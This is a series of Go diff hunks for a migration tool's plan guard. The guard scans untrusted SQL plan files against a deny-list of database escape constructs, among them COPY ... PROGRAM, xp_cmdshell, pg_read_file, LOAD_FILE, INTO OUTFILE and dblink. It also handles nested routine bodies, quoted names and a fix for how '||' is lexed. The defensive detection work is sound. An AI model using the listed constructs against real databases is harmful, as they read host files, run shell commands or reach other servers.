+func followsDynamicExecutor(tokens []lexer.Token, i int) bool {
+	for j := i - 1; j >= 0; j-- {
+		token := tokens[j]
+		switch {
+		case token.Type == lexer.TokenString:
+			continue
+		case token.MatchOperatorValue("(") || token.MatchOperatorValue("||"):
+			continue
+		case token.Type == lexer.TokenIdentifier:
+			return slices.Contains(dynamicExecutorKeywords, strings.ToUpper(token.Value))
+		default:
+			return false
+		}
+	}
+	return false
+}
+
+// followsKeyword reports whether the token at index i is directly preceded by
+// the given bare keyword.
+func followsKeyword(tokens []lexer.Token, i int, keyword string) bool {
+	return i > 0 && isKeyword(tokens[i-1], keyword)
+}
+
 // isRoutineDefinition reports whether the statement defines a server-side
 // routine, whose body is code even when it arrives as an ordinary string.
-func isRoutineDefinition(tokens []lexer.Token) bool {
-	if !statementStartsWith("CREATE")(tokens) {
+func isRoutineDefinition(ctx scanContext) bool {
+	if !statementStartsWith("CREATE")(ctx) {
 		return false
 	}
-	return containsKeyword("FUNCTION")(tokens) || containsKeyword("PROCEDURE")(tokens)
+	return containsKeyword("FUNCTION")(ctx) || containsKeyword("PROCEDURE")(ctx)
 }
 
 // dollarQuotedBody extracts the body of a PostgreSQL dollar-quoted string
@@ -304,6 +421,9 @@ func dollarQuotedBody(value string) (string, bool) {
 	return strings.TrimSuffix(body, tag), true
 }
 
+// unquoteStringLiteral returns the text of a quoted string literal, collapsing
+// the doubled quotes and backslash escapes SQL uses to embed the delimiter, so
+// nested code round-trips as the database would see it.
 func unquoteStringLiteral(value string) string {
 	if len(value) < 2 {
 		return value
@@ -312,13 +432,27 @@ func unquoteStringLiteral(value string) string {
 	if quote != '\'' && quote != '"' {
 		return value
 	}
-	return strings.TrimSuffix(value[1:], string(quote))
+	inner := strings.TrimSuffix(value[1:], string(quote))
+	var out strings.Builder
+	for i := 0; i < len(inner); i++ {
+		switch {
+		case inner[i] == quote && i+1 < len(inner) && inner[i+1] == quote:
+			out.WriteByte(quote)
+			i++
+		case inner[i] == '\\' && i+1 < len(inner):
+			out.WriteByte(inner[i+1])
+			i++
+		default:
+			out.WriteByte(inner[i])
+		}
+	}
+	return out.String()
 }
 
 func all(matchers ...tokenMatcher) tokenMatcher {
-	return func(tokens []lexer.Token) bool {
+	return func(ctx scanContext) bool {
 		for _, matcher := range matchers {
-			if !matcher(tokens) {
+			if !matcher(ctx) {
 				return false
 			}
 		}
@@ -326,23 +460,40 @@ func all(matchers ...tokenMatcher) tokenMatcher {
 	}
 }
 
+func anyMatch(matchers ...tokenMatcher) tokenMatcher {
+	return func(ctx scanContext) bool {
+		for _, matcher := range matchers {
+			if matcher(ctx) {
+				return true
+			}
+		}
+		return false
+	}
+}
+
+// statementBoundaryKeywords open a new statement inside a routine body, where
+// there is no leading semicolon before the first one.
+var statementBoundaryKeywords = []string{"BEGIN", "THEN", "ELSE", "LOOP", "DO"}
+
 // statementStartsWith matches a keyword sequence at the start of a statement:
-// at the beginning of the token stream, or directly after a semicolon. The
-// second case matters because the splitter and this scanner can disagree about
-// where a string literal ends, so a payload may still carry an embedded
-// statement inside what the splitter handed over as one statement.
+// at the beginning of the token stream, after a semicolon, or — inside a
+// routine body — after BEGIN/THEN/ELSE/LOOP/DO. The semicolon case matters
+// because the splitter and this scanner can disagree about where a string
+// literal ends; the body case matters because the first statement of a body
+// has no separator in front of it at all.
 func statementStartsWith(keywords ...string) tokenMatcher {
-	return func(tokens []lexer.Token) bool {
+	return func(ctx scanContext) bool {
 		atStatementStart := true
-		for i, token := range tokens {
+		for i, token := range ctx.tokens {
 			if token.Type == lexer.TokenSemicolon {
 				atStatementStart = true
 				continue
 			}
-			if atStatementStart && matchesKeywordSequence(tokens[i:], keywords) {
+			if atStatementStart && matchesKeywordSequence(ctx.tokens[i:], keywords) {
 				return true
 			}
-			atStatementStart = false
+			atStatementStart = ctx.inBody && token.Type == lexer.TokenIdentifier &&
+				slices.Contains(statementBoundaryKeywords, strings.ToUpper(token.Value))
 		}
 		return false
 	}
@@ -361,8 +512,8 @@ func matchesKeywordSequence(tokens []lexer.Token, keywords []string) bool {
 }
 
 func containsKeyword(keyword string) tokenMatcher {
-	return func(tokens []lexer.Token) bool {
-		for _, token := range tokens {
+	return func(ctx scanContext) bool {
+		for _, token := range ctx.tokens {
 			if isKeyword(token, keyword) {
 				return true
 			}
@@ -371,13 +522,18 @@ func containsKeyword(keyword string) tokenMatcher {
 	}
 }
 
-// adjacentKeywords matches two keywords next to each other anywhere in the
-// statement, which is how MySQL spells its DATA DIRECTORY / INDEX DIRECTORY
-// table options.
-func adjacentKeywords(first, second string) tokenMatcher {
-	return func(tokens []lexer.Token) bool {
-		for i := range tokens[:max(len(tokens)-1, 0)] {
-			if isKeyword(tokens[i], first) && isKeyword(tokens[i+1], second) {
+// keywordSequenceWithStringArgument matches adjacent keywords followed by a
+// string literal. `SELECT ... INTO OUTFILE '/tmp/x'` matches; the SQL Server
+// table form `SELECT * INTO outfile FROM src` and `INSERT INTO outfile ...` do
+// not, because neither is followed by a path literal.
+func keywordSequenceWithStringArgument(keywords ...string) tokenMatcher {
+	return func(ctx scanContext) bool {
+		for i := range ctx.tokens {
+			if !matchesKeywordSequence(ctx.tokens[i:], keywords) {
+				continue
+			}
+			next := i + len(keywords)
+			if next < len(ctx.tokens) && ctx.tokens[next].Type == lexer.TokenString {
 				return true
 			}
 		}
@@ -385,21 +541,69 @@ func adjacentKeywords(first, second string) tokenMatcher {
 	}
 }
 
-// keywordAfterKeyword matches a keyword whose preceding significant token —
-// ignoring operators such as `=` — is another keyword. It anchors constructs
-// like INTO OUTFILE and ENGINE=FEDERATED, so a column merely named `outfile`
-// does not match.
-func keywordAfterKeyword(previous, keyword string) tokenMatcher {
-	return func(tokens []lexer.Token) bool {
-		lastIdentifier := -1
-		for i, token := range tokens {
-			if token.Type != lexer.TokenIdentifier {
+// tableOptionPath matches a MySQL table option spelled as two adjacent
+// keywords assigned a path, such as `DATA DIRECTORY = '/var/lib/x'`. A column
+// named `directory` or an index named `directory` never carries a path
+// literal, so neither matches.
+func tableOptionPath(first, second string) tokenMatcher {
+	return func(ctx scanContext) bool {
+		for i := range ctx.tokens {
+			if !matchesKeywordSequence(ctx.tokens[i:], []string{first, second}) {
 				continue
 			}
-			if isKeyword(token, keyword) && lastIdentifier >= 0 && isKeyword(tokens[lastIdentifier], previous) {
+			next := i + 2
+			if next < len(ctx.tokens) && ctx.tokens[next].MatchOperatorValue("=") {
+				next++
+			}
+			if next < len(ctx.tokens) && ctx.tokens[next].Type == lexer.TokenString {
 				return true
 			}
-			lastIdentifier = i
+		}
+		return false
+	}
+}
+
+// engineAssignment matches `ENGINE = <name>`, the MySQL and ClickHouse storage
+// engine selector, including the ClickHouse parameterized form
+// `ENGINE = MySQL(...)`. Only an `=` may sit between the two, so a column list
+// such as `(engine, federated)` does not match.
+func engineAssignment(name string) tokenMatcher {
+	return func(ctx scanContext) bool {
+		for i, token := range ctx.tokens {
+			if !isKeyword(token, "ENGINE") {
+				continue
+			}
+			next := i + 1
+			if next < len(ctx.tokens) && ctx.tokens[next].MatchOperatorValue("=") {
+				next++
+			}
+			if next < len(ctx.tokens) && isKeyword(ctx.tokens[next], name) {
+				return true
+			}
+		}
+		return false
+	}
+}
+
+// pragmaAssignment matches `PRAGMA <name> = ...`, including the schema-
+// qualified `PRAGMA main.<name> = ...` spelling.
+func pragmaAssignment(name string) tokenMatcher {
+	return func(ctx scanContext) bool {
+		for i, token := range ctx.tokens {
+			if !isKeyword(token, "PRAGMA") {
+				continue
+			}
+			for j := i + 1; j < len(ctx.tokens) && j <= i+3; j++ {
+				if ctx.tokens[j].MatchOperatorValue(".") {
+					continue
+				}
+				if isKeyword(ctx.tokens[j], name) {
+					return true
+				}
+				if ctx.tokens[j].Type != lexer.TokenIdentifier {
+					break
+				}
+			}
 		}
 		return false
 	}
@@ -417,7 +621,7 @@ var nameIntroducingKeywords = []string{
 
 // calledFunction matches an identifier in call position: immediately followed
 // by an opening parenthesis, and not sitting where DDL introduces an object
-// name. This is what separates `SELECT dblink_exec(...)` from a table called
+// name. This separates `SELECT dblink_exec(...)` from a table called
 // `dblink_events (id integer)` or an index named `lo_import`.
 func calledFunction(name string) tokenMatcher {
 	return callPositionMatcher(name, false)
@@ -430,23 +634,25 @@ func calledFunctionPrefix(prefix string) tokenMatcher {
 }
 
 func callPositionMatcher(name string, prefix bool) tokenMatcher {
-	return func(tokens []lexer.Token) bool {
-		for i, token := range tokens {
-			if token.Type != lexer.TokenIdentifier || i+1 >= len(tokens) {
+	return func(ctx scanContext) bool {
+		for i, token := range ctx.tokens {
+			if i+1 >= len(ctx.tokens) || !ctx.tokens[i+1].MatchOperatorValue("(") {
 				continue
 			}
-			if !tokens[i+1].MatchOperatorValue("(") {
+			// Quoting a name does not change which function runs, so call
+			// position accepts the quoted spellings too — "pg_read_file",
+			// `load_file`, [xp_cmdshell]. isKeyword stays strict, so a table
+			// named "attach" remains ordinary DDL.
+			value, ok := callableName(token)
+			if !ok {
 				continue
 			}
-			value := strings.ToUpper(token.Value)
 			matched := value == name || (prefix && strings.HasPrefix(value, name))
 			if !matched {
 				continue
 			}
-			// A qualified call (pg_catalog.pg_read_file(...)) is preceded by
-			// `.`, which is not a name-introducing keyword, so it still fires.
-			if i > 0 && tokens[i-1].Type == lexer.TokenIdentifier &&
-				slices.Contains(nameIntroducingKeywords, strings.ToUpper(tokens[i-1].Value)) {
+			if i > 0 && ctx.tokens[i-1].Type == lexer.TokenIdentifier &&
+				slices.Contains(nameIntroducingKeywords, strings.ToUpper(ctx.tokens[i-1].Value)) {
 				continue
 			}
 			return true
@@ -455,16 +661,64 @@ func callPositionMatcher(name string, prefix bool) tokenMatcher {
 	}
 }
 
+// procedureOrFunction matches a name used as a called function or as the
+// target of EXEC/EXECUTE/CALL, which is how SQL Server invokes xp_cmdshell
+// and friends.
+func procedureOrFunction(name string) tokenMatcher {
+	return func(ctx scanContext) bool {
+		if calledFunction(name)(ctx) {
+			return true
+		}
+		for i, token := range ctx.tokens {
+			value, ok := callableName(token)
+			if !ok || value != name || i == 0 {
+				continue
+			}
+			previous := ctx.tokens[i-1]
+			if previous.Type != lexer.TokenIdentifier {
+				continue
+			}
+			switch strings.ToUpper(previous.Value) {
+			case "EXEC", "EXECUTE", "CALL":
+				return true
+			}
+		}
+		return false
+	}
+}
+
+// callableName returns the upper-cased name of a token that can name a
+// callable, unwrapping the quoted spellings. Double-quoted names arrive as
+// strings from the lexer; backticked and bracketed ones keep their quotes.
+func callableName(token lexer.Token) (string, bool) {
+	value := token.Value
+	switch token.Type {
+	case lexer.TokenIdentifier:
+		value = strings.Trim(value, "`[]")
+	case lexer.TokenString:
+		if !strings.HasPrefix(value, `"`) {
+			return "", false
+		}
+		value = strings.Trim(value, `"`)
+	default:
+		return "", false
+	}
+	if value == "" {
+		return "", false
+	}
+	return strings.ToUpper(value), true
+}
+
 // stringArgumentAfter reports whether a string literal directly follows one of
 // the given keywords, which is how a file path is passed to COPY.
 // `COPY t FROM STDIN` has no string argument and does not match.
 func stringArgumentAfter(keywords ...string) tokenMatcher {
-	return func(tokens []lexer.Token) bool {
-		for i, token := range tokens {
-			if token.Type != lexer.TokenIdentifier || i+1 >= len(tokens) {
+	return func(ctx scanContext) bool {
+		for i, token := range ctx.tokens {
+			if token.Type != lexer.TokenIdentifier || i+1 >= len(ctx.tokens) {
 				continue
 			}
-			if tokens[i+1].Type != lexer.TokenString {
+			if ctx.tokens[i+1].Type != lexer.TokenString {
 				continue
 			}
 			if slices.Contains(keywords, strings.ToUpper(token.Value)) {

--- a/internal/atlasschema/planguard.go
+++ b/internal/atlasschema/planguard.go
@@ -377,13 +377,18 @@ var dynamicExecutorKeywords = []string{"EXECUTE", "EXEC", "PREPARE", "SP_EXECUTE
 // followsDynamicExecutor reports whether the string at index i is an argument
 // of a dynamic executor, walking back over `(` and `||` so that
 // `EXECUTE ('DROP ' || 'TABLE t')` is still recognized as code.
+//
+// The lexer emits `||` as two separate `|` operator tokens, so the walk-back
+// has to accept the single-character form; matching only "||" made this whole
+// branch dead code and let concatenated executor arguments through unscanned.
 func followsDynamicExecutor(tokens []lexer.Token, i int) bool {
 	for j := i - 1; j >= 0; j-- {
 		token := tokens[j]
 		switch {
 		case token.Type == lexer.TokenString:
 			continue
-		case token.MatchOperatorValue("(") || token.MatchOperatorValue("||"):
+		case token.MatchOperatorValue("(") || token.MatchOperatorValue("||") ||
+			token.MatchOperatorValue("|"):
 			continue
 		case token.Type == lexer.TokenIdentifier:
 			return slices.Contains(dynamicExecutorKeywords, strings.ToUpper(token.Value))

--- a/internal/atlasschema/planguard.go
+++ b/internal/atlasschema/planguard.go
@@ -6,14 +6,15 @@ import (
 	"slices"
 	"strings"
 
+	"github.com/stokaro/ptah/core/platform"
 	"github.com/stokaro/ptah/internal/lexer"
 )
 
-// PlanEscapeError reports that a pre-planned statement can reach databases or
-// files outside the dev database, so replaying it on the dev database would
-// not be a sandboxed rehearsal: the "verification" could modify the real
-// target (or the host filesystem) and could even pass while the effect landed
-// somewhere the comparison never looks.
+// PlanEscapeError reports that a pre-planned statement matched a known
+// dev-database escape construct, so replaying it would not stay inside the dev
+// database: the "verification" could modify the real target (or the host
+// filesystem) and could even pass while the effect landed somewhere the
+// comparison never looks.
 type PlanEscapeError struct {
 	// StatementIndex is the 1-based position of the offending statement.
 	StatementIndex int
@@ -26,7 +27,7 @@ type PlanEscapeError struct {
 func (e *PlanEscapeError) Error() string {
 	return fmt.Sprintf(
 		"pre-planned migration cannot be verified on a dev database: statement %d uses %s, which %s. "+
-			"Replaying it would not be a sandboxed rehearsal — it could modify the real target or the host "+
+			"Replaying it would not stay inside the dev database — it could modify the real target or the host "+
 			"filesystem while the plan is still being verified, so the plan is refused before anything runs. "+
 			"Review the statement and run it deliberately outside `schema apply --plan`",
 		e.StatementIndex, e.Construct, e.Reach)
@@ -38,127 +39,188 @@ func IsPlanEscape(err error) bool {
 	return errors.As(err, &target)
 }
 
-// escapeRule matches one dev-database escape construct. A rule fires only on
-// bare (unquoted) SQL keywords: the lexer emits double-quoted identifiers as
-// strings and keeps the quotes on backticked ones, and a quoted keyword is an
-// ordinary identifier to the database anyway, so a table named "attachment" or
-// a string literal containing ATTACH never matches.
+// maxPlanGuardNesting bounds how deep the scanner follows code carried inside
+// string literals (routine bodies inside routine bodies).
+const maxPlanGuardNesting = 4
+
+// tokenMatcher reports whether a statement's significant tokens match one
+// escape construct.
+type tokenMatcher func(tokens []lexer.Token) bool
+
+// escapeRule is one known escape construct: how to recognize it, and what it
+// can reach.
 type escapeRule struct {
-	// leading, when non-empty, requires the statement to start with this
-	// keyword.
-	leading string
-	// keyword is the bare identifier that triggers the rule. Empty matches
-	// any statement that satisfies leading and stringArgAfter.
-	keyword string
-	// prefix, when true, matches identifiers that merely start with keyword.
-	prefix bool
-	// stringArgAfter, when non-empty, additionally requires a string literal
-	// to directly follow one of these keywords (a file path argument).
-	stringArgAfter []string
-	construct      string
-	reach          string
+	construct string
+	reach     string
+	match     tokenMatcher
 }
 
-// escapeRules enumerate the constructs that break dev-database containment.
+// escapeRules enumerates the escape constructs this guard knows about.
+//
+// This list is a best-effort deny-list of known constructs, NOT a sandbox and
+// NOT exhaustive. SQL dialects offer many ways to address something other than
+// the connected database — server-side language extensions, foreign-data
+// wrappers, storage-engine options, loadable modules, and engine-specific
+// pragmas and functions — and new ones arrive with new engine versions. A
+// determined author of a plan file can very likely find a construct this list
+// does not name.
+//
+// The security consequence is stated plainly in the docs and repeated here: a
+// --dev-url must be a database you are willing to have a foreign plan file
+// execute arbitrary SQL against. The only path with no such exposure is the
+// ephemeral SQLite dev database Ptah creates itself for SQLite targets, which
+// is a throwaway file in a private temp directory.
+//
 // The set is dialect-generic on purpose: a plan file is an untrusted document
 // and the reader does not know which engine authored it, so every family's
-// escape hatches are refused regardless of the target dialect.
+// escape hatches are checked regardless of the target dialect.
 var escapeRules = []escapeRule{
 	{
-		leading: "ATTACH", keyword: "ATTACH",
 		construct: "ATTACH",
 		reach:     "attaches another SQLite database file to the session, so the statement can write to databases other than the dev database",
+		match:     statementStartsWith("ATTACH"),
 	},
 	{
-		leading: "DETACH", keyword: "DETACH",
 		construct: "DETACH",
 		reach:     "manipulates the session's attached SQLite databases rather than the dev database schema",
+		match:     statementStartsWith("DETACH"),
 	},
 	{
-		leading: "VACUUM", keyword: "INTO",
 		construct: "VACUUM INTO",
 		reach:     "writes a copy of the database to an arbitrary path on the host filesystem",
+		match:     all(statementStartsWith("VACUUM"), containsKeyword("INTO")),
 	},
 	{
-		leading: "LOAD", keyword: "INFILE",
+		construct: "PRAGMA temp_store_directory",
+		reach:     "redirects SQLite temporary storage to an arbitrary directory on the host filesystem",
+		match:     statementStartsWith("PRAGMA", "TEMP_STORE_DIRECTORY"),
+	},
+	{
+		construct: "DO",
+		reach:     "executes an anonymous server-side code block, which can call out to anything the database server can reach",
+		match:     statementStartsWith("DO"),
+	},
+	{
 		construct: "LOAD DATA INFILE",
 		reach:     "reads a file from the database server or the client host",
+		match:     all(statementStartsWith("LOAD"), containsKeyword("INFILE")),
 	},
 	{
-		keyword:   "OUTFILE",
 		construct: "SELECT ... INTO OUTFILE",
 		reach:     "writes a file on the database server host",
+		match:     keywordAfterKeyword("INTO", "OUTFILE"),
 	},
 	{
-		keyword:   "DUMPFILE",
 		construct: "SELECT ... INTO DUMPFILE",
 		reach:     "writes a file on the database server host",
+		match:     keywordAfterKeyword("INTO", "DUMPFILE"),
 	},
 	{
-		leading: "COPY", keyword: "PROGRAM",
+		construct: "LOAD_FILE",
+		reach:     "reads a file on the database server host",
+		match:     calledFunction("LOAD_FILE"),
+	},
+	{
+		construct: "ENGINE=FEDERATED",
+		reach:     "stores the table on another database server reached over the network",
+		match:     keywordAfterKeyword("ENGINE", "FEDERATED"),
+	},
+	{
+		construct: "CREATE SERVER",
+		reach:     "defines a connection to another database server",
+		match:     statementStartsWith("CREATE", "SERVER"),
+	},
+	{
+		construct: "INSTALL PLUGIN",
+		reach:     "loads a server-side plugin, which runs native code on the database server host",
+		match:     statementStartsWith("INSTALL", "PLUGIN"),
+	},
+	{
+		construct: "INSTALL COMPONENT",
+		reach:     "loads a server-side component, which runs native code on the database server host",
+		match:     statementStartsWith("INSTALL", "COMPONENT"),
+	},
+	{
+		construct: "DATA DIRECTORY",
+		reach:     "places table data at an arbitrary path on the database server host",
+		match:     adjacentKeywords("DATA", "DIRECTORY"),
+	},
+	{
+		construct: "INDEX DIRECTORY",
+		reach:     "places index data at an arbitrary path on the database server host",
+		match:     adjacentKeywords("INDEX", "DIRECTORY"),
+	},
+	{
 		construct: "COPY ... PROGRAM",
 		reach:     "executes a shell command on the database server host",
+		match:     all(statementStartsWith("COPY"), containsKeyword("PROGRAM")),
 	},
 	{
-		leading: "COPY", stringArgAfter: []string{"FROM", "TO"},
 		construct: "COPY with a file path",
 		reach:     "reads or writes a file on the database server host",
+		match:     all(statementStartsWith("COPY"), stringArgumentAfter("FROM", "TO")),
 	},
 	{
-		keyword: "DBLINK", prefix: true,
 		construct: "dblink",
 		reach:     "opens a connection to another database server",
+		match:     calledFunctionPrefix("DBLINK"),
 	},
 	{
-		keyword:   "POSTGRES_FDW",
 		construct: "postgres_fdw",
 		reach:     "federates data from another database server",
+		match:     containsKeyword("POSTGRES_FDW"),
 	},
 	{
-		keyword:   "FILE_FDW",
 		construct: "file_fdw",
 		reach:     "exposes files on the database server host as tables",
+		match:     containsKeyword("FILE_FDW"),
 	},
 	{
-		keyword:   "PG_READ_FILE",
 		construct: "pg_read_file",
 		reach:     "reads a file on the database server host",
+		match:     calledFunction("PG_READ_FILE"),
 	},
 	{
-		keyword:   "PG_READ_BINARY_FILE",
 		construct: "pg_read_binary_file",
 		reach:     "reads a file on the database server host",
+		match:     calledFunction("PG_READ_BINARY_FILE"),
 	},
 	{
-		keyword:   "PG_LS_DIR",
 		construct: "pg_ls_dir",
 		reach:     "lists a directory on the database server host",
+		match:     calledFunction("PG_LS_DIR"),
 	},
 	{
-		keyword:   "LO_IMPORT",
 		construct: "lo_import",
 		reach:     "reads a file on the database server host",
+		match:     calledFunction("LO_IMPORT"),
 	},
 	{
-		keyword:   "LO_EXPORT",
 		construct: "lo_export",
 		reach:     "writes a file on the database server host",
+		match:     calledFunction("LO_EXPORT"),
 	},
 }
 
-// CheckPlanStatementsSandboxable refuses pre-planned statements that could
-// escape the dev database during rehearsal. It is the gate in front of every
+// CheckPlanStatementsSandboxable refuses pre-planned statements that match a
+// known dev-database escape construct. It is the gate in front of every
 // replay: a plan file is an untrusted input, and a "verification" that can
 // mutate the real target or the host filesystem is worse than no verification
 // because it reports success while the effect landed elsewhere.
 //
-// Statements are scanned under both string-escape interpretations (with and
+// It is a best-effort deny-list, not a sandbox — see [escapeRules] for what
+// that does and does not buy the caller.
+//
+// dialect selects the same lexer behavior [SplitApplyStatements] uses, so the
+// scanner sees the statements the executor would run. Statements are
+// additionally scanned under both string-escape interpretations (with and
 // without backslash escapes), so a payload cannot hide a keyword inside text
-// that only one dialect's lexer would treat as a string literal.
-func CheckPlanStatementsSandboxable(statements []string) error {
+// that only one dialect's lexer would treat as a string literal, and code
+// carried inside routine bodies is scanned as code rather than as data.
+func CheckPlanStatementsSandboxable(statements []string, dialect string) error {
 	for i, statement := range statements {
 		for _, backslashEscapes := range []bool{false, true} {
-			if err := checkStatementSandboxable(statement, i+1, backslashEscapes); err != nil {
+			if err := checkStatementSandboxable(statement, i+1, backslashEscapes, dialect, 0); err != nil {
 				return err
 			}
 		}
@@ -166,86 +228,272 @@ func CheckPlanStatementsSandboxable(statements []string) error {
 	return nil
 }
 
-func checkStatementSandboxable(statement string, index int, backslashEscapes bool) error {
-	tokens := significantTokens(statement, backslashEscapes)
+func checkStatementSandboxable(statement string, index int, backslashEscapes bool, dialect string, depth int) error {
+	tokens := significantTokens(statement, backslashEscapes, dialect)
 	if len(tokens) == 0 {
 		return nil
 	}
 	for _, rule := range escapeRules {
-		if rule.leading != "" && !hasLeadingKeyword(tokens, rule.leading) {
-			continue
-		}
-		if !ruleMatches(rule, tokens) {
+		if !rule.match(tokens) {
 			continue
 		}
 		return &PlanEscapeError{StatementIndex: index, Construct: rule.construct, Reach: rule.reach}
 	}
+	if depth >= maxPlanGuardNesting {
+		return nil
+	}
+	// A dollar-quoted body and a routine definition's body are code, not data:
+	// the lexer hands them over as a single string token, so nothing inside
+	// would otherwise be scanned. Once inside such a body, deeper string
+	// literals are code as well — that is how dynamic SQL (EXECUTE '...')
+	// nests another routine definition.
+	for _, nested := range codeBearingStrings(tokens, depth > 0) {
+		if err := checkStatementSandboxable(nested, index, backslashEscapes, dialect, depth+1); err != nil {
+			return err
+		}
+	}
 	return nil
 }
 
-// hasLeadingKeyword reports whether keyword starts a statement anywhere in the
-// token stream: at the beginning, or directly after a semicolon. The second
-// case matters because the statement splitter and this scanner can disagree
-// about where a string literal ends, so a payload may still carry an embedded
+// codeBearingStrings returns the string-literal contents of a statement that
+// carry executable code: dollar-quoted strings anywhere (PostgreSQL routine
+// bodies and quoted blocks), plus every string literal of a routine definition
+// or of a statement already known to be code, whose bodies may be ordinary
+// quoted strings. Ordinary top-level statements keep their string literals
+// treated as data, so a column default containing the words
+// "COPY ... FROM PROGRAM" stays harmless.
+func codeBearingStrings(tokens []lexer.Token, codeContext bool) []string {
+	routine := codeContext || isRoutineDefinition(tokens)
+	var nested []string
+	for _, token := range tokens {
+		if token.Type != lexer.TokenString {
+			continue
+		}
+		if inner, ok := dollarQuotedBody(token.Value); ok {
+			nested = append(nested, inner)
+			continue
+		}
+		if routine {
+			nested = append(nested, unquoteStringLiteral(token.Value))
+		}
+	}
+	return nested
+}
+
+// isRoutineDefinition reports whether the statement defines a server-side
+// routine, whose body is code even when it arrives as an ordinary string.
+func isRoutineDefinition(tokens []lexer.Token) bool {
+	if !statementStartsWith("CREATE")(tokens) {
+		return false
+	}
+	return containsKeyword("FUNCTION")(tokens) || containsKeyword("PROCEDURE")(tokens)
+}
+
+// dollarQuotedBody extracts the body of a PostgreSQL dollar-quoted string
+// ($$body$$ or $tag$body$tag$).
+func dollarQuotedBody(value string) (string, bool) {
+	if !strings.HasPrefix(value, "$") {
+		return "", false
+	}
+	end := strings.Index(value[1:], "$")
+	if end < 0 {
+		return "", false
+	}
+	tag := value[:end+2]
+	body := strings.TrimPrefix(value, tag)
+	return strings.TrimSuffix(body, tag), true
+}
+
+func unquoteStringLiteral(value string) string {
+	if len(value) < 2 {
+		return value
+	}
+	quote := value[0]
+	if quote != '\'' && quote != '"' {
+		return value
+	}
+	return strings.TrimSuffix(value[1:], string(quote))
+}
+
+func all(matchers ...tokenMatcher) tokenMatcher {
+	return func(tokens []lexer.Token) bool {
+		for _, matcher := range matchers {
+			if !matcher(tokens) {
+				return false
+			}
+		}
+		return true
+	}
+}
+
+// statementStartsWith matches a keyword sequence at the start of a statement:
+// at the beginning of the token stream, or directly after a semicolon. The
+// second case matters because the splitter and this scanner can disagree about
+// where a string literal ends, so a payload may still carry an embedded
 // statement inside what the splitter handed over as one statement.
-func hasLeadingKeyword(tokens []lexer.Token, keyword string) bool {
-	atStatementStart := true
-	for _, token := range tokens {
-		if token.Type == lexer.TokenSemicolon {
-			atStatementStart = true
-			continue
+func statementStartsWith(keywords ...string) tokenMatcher {
+	return func(tokens []lexer.Token) bool {
+		atStatementStart := true
+		for i, token := range tokens {
+			if token.Type == lexer.TokenSemicolon {
+				atStatementStart = true
+				continue
+			}
+			if atStatementStart && matchesKeywordSequence(tokens[i:], keywords) {
+				return true
+			}
+			atStatementStart = false
 		}
-		if atStatementStart && token.Type == lexer.TokenIdentifier && strings.EqualFold(token.Value, keyword) {
-			return true
-		}
-		atStatementStart = false
+		return false
 	}
-	return false
 }
 
-func ruleMatches(rule escapeRule, tokens []lexer.Token) bool {
-	if len(rule.stringArgAfter) > 0 {
-		return hasStringArgumentAfter(tokens, rule.stringArgAfter)
+func matchesKeywordSequence(tokens []lexer.Token, keywords []string) bool {
+	if len(tokens) < len(keywords) {
+		return false
 	}
-	for _, token := range tokens {
-		if token.Type != lexer.TokenIdentifier {
-			continue
-		}
-		value := strings.ToUpper(token.Value)
-		if value == rule.keyword || (rule.prefix && strings.HasPrefix(value, rule.keyword)) {
-			return true
+	for i, keyword := range keywords {
+		if !isKeyword(tokens[i], keyword) {
+			return false
 		}
 	}
-	return false
+	return true
 }
 
-// hasStringArgumentAfter reports whether a string literal directly follows one
-// of the given bare keywords, which is how a file path is passed to COPY.
+func containsKeyword(keyword string) tokenMatcher {
+	return func(tokens []lexer.Token) bool {
+		for _, token := range tokens {
+			if isKeyword(token, keyword) {
+				return true
+			}
+		}
+		return false
+	}
+}
+
+// adjacentKeywords matches two keywords next to each other anywhere in the
+// statement, which is how MySQL spells its DATA DIRECTORY / INDEX DIRECTORY
+// table options.
+func adjacentKeywords(first, second string) tokenMatcher {
+	return func(tokens []lexer.Token) bool {
+		for i := range tokens[:max(len(tokens)-1, 0)] {
+			if isKeyword(tokens[i], first) && isKeyword(tokens[i+1], second) {
+				return true
+			}
+		}
+		return false
+	}
+}
+
+// keywordAfterKeyword matches a keyword whose preceding significant token —
+// ignoring operators such as `=` — is another keyword. It anchors constructs
+// like INTO OUTFILE and ENGINE=FEDERATED, so a column merely named `outfile`
+// does not match.
+func keywordAfterKeyword(previous, keyword string) tokenMatcher {
+	return func(tokens []lexer.Token) bool {
+		lastIdentifier := -1
+		for i, token := range tokens {
+			if token.Type != lexer.TokenIdentifier {
+				continue
+			}
+			if isKeyword(token, keyword) && lastIdentifier >= 0 && isKeyword(tokens[lastIdentifier], previous) {
+				return true
+			}
+			lastIdentifier = i
+		}
+		return false
+	}
+}
+
+// nameIntroducingKeywords precede an object *name* in DDL. An identifier in
+// that position is being declared or referenced, never called, so a table
+// named `dblink_events` — whose name is followed by `(` in a CREATE TABLE — is
+// not a dblink call site.
+var nameIntroducingKeywords = []string{
+	"TABLE", "INDEX", "VIEW", "SEQUENCE", "TRIGGER", "FUNCTION", "PROCEDURE",
+	"TYPE", "DOMAIN", "EXTENSION", "SERVER", "SCHEMA", "DATABASE", "CONSTRAINT",
+	"REFERENCES", "INTO", "EXISTS", "ONLY", "ON", "KEY", "COLUMN", "RENAME", "TO", "AS",
+}
+
+// calledFunction matches an identifier in call position: immediately followed
+// by an opening parenthesis, and not sitting where DDL introduces an object
+// name. This is what separates `SELECT dblink_exec(...)` from a table called
+// `dblink_events (id integer)` or an index named `lo_import`.
+func calledFunction(name string) tokenMatcher {
+	return callPositionMatcher(name, false)
+}
+
+// calledFunctionPrefix is calledFunction for a family of function names that
+// share a prefix, such as dblink, dblink_exec, and dblink_connect.
+func calledFunctionPrefix(prefix string) tokenMatcher {
+	return callPositionMatcher(prefix, true)
+}
+
+func callPositionMatcher(name string, prefix bool) tokenMatcher {
+	return func(tokens []lexer.Token) bool {
+		for i, token := range tokens {
+			if token.Type != lexer.TokenIdentifier || i+1 >= len(tokens) {
+				continue
+			}
+			if !tokens[i+1].MatchOperatorValue("(") {
+				continue
+			}
+			value := strings.ToUpper(token.Value)
+			matched := value == name || (prefix && strings.HasPrefix(value, name))
+			if !matched {
+				continue
+			}
+			// A qualified call (pg_catalog.pg_read_file(...)) is preceded by
+			// `.`, which is not a name-introducing keyword, so it still fires.
+			if i > 0 && tokens[i-1].Type == lexer.TokenIdentifier &&
+				slices.Contains(nameIntroducingKeywords, strings.ToUpper(tokens[i-1].Value)) {
+				continue
+			}
+			return true
+		}
+		return false
+	}
+}
+
+// stringArgumentAfter reports whether a string literal directly follows one of
+// the given keywords, which is how a file path is passed to COPY.
